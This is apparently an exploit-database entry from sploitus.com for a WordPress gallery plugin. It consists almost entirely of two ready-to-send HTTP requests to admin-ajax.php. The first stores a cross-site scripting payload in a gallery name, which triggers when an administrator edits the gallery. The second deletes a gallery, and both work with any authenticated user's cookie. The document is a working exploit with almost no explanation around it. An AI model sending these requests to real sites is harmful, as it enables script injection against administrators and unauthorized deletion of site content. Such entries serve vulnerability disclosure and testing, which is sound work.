Share
## https://sploitus.com/exploit?id=WPEX-ID:1B9AFC2C-2AD5-4B9A-BA8B-88784A378C8A
Add a gallery with an XSS payload in it (triggered when editing a gallery)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 142
Connection: close
Cookie: [any authenticated user]

action=ufg_gallery_filters&id=1&gallery_name=Test%22%20style%3danimation-name%3arotation%20onanimationstart%3dalert(%2fXSS%2f)%2f%2f&filters=%5B%5D


Delete a gallery:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 59
Connection: close
Cookie: [any authenticated user]

action=ufg_remove_gallery&do_action=single&ufg_gallery_id=1